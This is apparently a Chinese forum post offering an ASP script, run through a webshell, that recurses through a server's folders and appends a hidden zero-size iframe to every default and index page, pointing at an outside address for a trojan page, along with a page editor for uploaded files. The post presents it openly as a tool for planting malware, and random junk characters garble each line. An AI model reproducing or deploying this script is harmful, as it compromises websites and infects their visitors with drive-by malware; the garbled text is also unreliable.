一个webshell下自动挂马的ASP,挂马的朋友不可错过哦^_^ Fm<jg}>MAd
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<% ME$2P!o
ASP_SELF=Request.ServerVariables("PATH_INFO") *jM_ wwG
s=Request("fd") I@0z/4H``
ex=Request("ex") ?a5h iN0
pth=Request("pth") O^9CV*]!n
newcnt=Request("newcnt") L*g.
If ex<>"" AND pth<>"" Then Ap5}5 ewM
select Case ex $#%U\mIz
Case "edit" Jd5\&ma
CALL file_show(pth) b?_e+:\UV
Case "save" I|,pE**T
CALL file_save(pth) *16<M)7
End select G2.|fp_}pG
Else YD&|1h
%> |KL')&"
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<input type="text" name="fd" size="40"> ))7LE|1l
<input type="submit" value="SUBMIT"> v(DwU!
</form> bIgh@= 2
<%End If%> M|\^UF2e
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Function IsPattern(patt,str) \6{krn|
Set regEx=New RegExp 7~_I=-
regEx.Pattern=patt _e%dM
regEx.IgnoreCase=True IY=/`g
retVal=regEx.Test(str) :e*DTVv8
Set regEx=Nothing B:4Ka]{YO
If retVal=True Then 7vn%kW=$
IsPattern=True ypx: )e"/
Else *7ZGq(O
IsPattern=False )Im3'0l>
End If TG}d3ZU
End Function ^+ZgWS^%
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If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then %Y~>Jl
sch s Xka<I3UD5
Else veeI==]
If s<>"" Then Response.Write "Invalid Agrument!" bS.s?a
End If vCw<G6tD
Sub sch(s) @@I7$*
oN eRrOr rEsUmE nExT [4sEVu}
Set fs=Server.createObject("Scripting.FileSystemObject") HPrq1QpK
Set fd=fs.GetFolder(s) q\%cFB}
Set fi=fd.Files {;s;.
Set sf=fd.SubFolders Ck\7F?S
For Each f in fi $ a?
rtn=f.Path f-Jbs`(+
step_all rtn vw2`:]Q+
Next {(
If sf.Count<>0 Then _AFQ >j
For Each l In sf Ko6^iI1
sch l ,~COZi;R.D
Next $9 +YNgW>
End If &(EHq
End Sub 6i.gyD
Sub step_all(agr) 8)N@qUV
retVal=IsPattern("(\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b",agr) _A98
If retVal Then %Y]=1BRk}
step1 agr `ltN,?/
step2 agr sIy
Else =<c#owe:m
Exit Sub y}FZD?"
End If `:eU.
End Sub 5;\gJf
%> KzjC/1sd
<%Sub step1(str1)%> 'fx UV<K&
<a href="<%=ASP_SELF%>?ex=edit&pth=<%=str1%>" target="_blank"><%=str1%></a><br> !M7<BD};
<%End Sub%> \\,f{?w
<% .Da'pOe
Sub step2(str2) &$'z
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0 frameborder=0></iframe>" Kv37s0|g
Set fs=Server.createObject("Scripting.FileSystemObject") f$.?$
isExist=fs.FileExists(str2) 6sJw@OaJ
If isExist Then 33'Y [4
Set f=fs.GetFile(str2) %dMqpY7"
Set f_addcode=f.OpenAsTextStream(8,-2) BecPT
f_addcode.Write addcode 8'Z:ydj^,
f_addcode.Close Ej=3/RBsV
Set f=Nothing -#In;~
End If lx |5?P
Set fs=Nothing jCioE
End Sub Bj Wr5SJ
%> b0v:12q
<% 3*ixlO:qGk
Sub file_show(fname) s&a1y~rv
Set fs1=Server.createObject("Scripting.FileSystemObject") H#i{?RM@l
isExist=fs1.FileExists(fname) R'}95S<
If isExist Then ~j>D=!
Set fcnt=fs1.OpenTextFile(fname) Z(u5$<up
cnt=fcnt.ReadAll p5\]5bb
fcnt.Close Y ^KTkS0D
Set fs1=Nothing%> ^03j8Pc-c
FILE: <%=fname%> UlcH%pxTt1
<form action="<%=ASP_SELF%>" method="POST"> JIm4vS
<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea> KS}hU~
<input type="hidden" name="pth" value="<%=fname%>"> ,CvG 20>
<input type="hidden" name="ex" value="save"> i;z{zVR
<input type="submit" value="SAVE"> oVvc?P
</form> ~]HN9R^&
<%Else%> P>i%7:OMZA
<p>THE FILE IS NOT EXIT OR HAVE deleteD.</p> 7ZxaPkIu&%
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End If vb
End Sub {ZU1x C
%> Rk6deI]
<% Cx<0 H
Sub file_save(fname) 0AK,&nbF
Set fs2=Server.createObject("Scripting.FileSystemObject") KLoE&ds
Set newf=fs2.createTextFile(fname,True) dS2G}L^L
newf.Write newcnt uo\ .7[1
newf.Close g.py+
Set fs2=Nothing ;U9J++\d<A
Response.Write "<p>THE FILE WAS MODIFIED SUCCESSFULLY.</p>" ^y!;xc$(Qs
End Sub /ID3s`D)
%> {-3L IO
</body> VhL{'w7f
</html> ,`D~py,
传进服务器以后 直接输入需要挂马的路径就可以直接挂了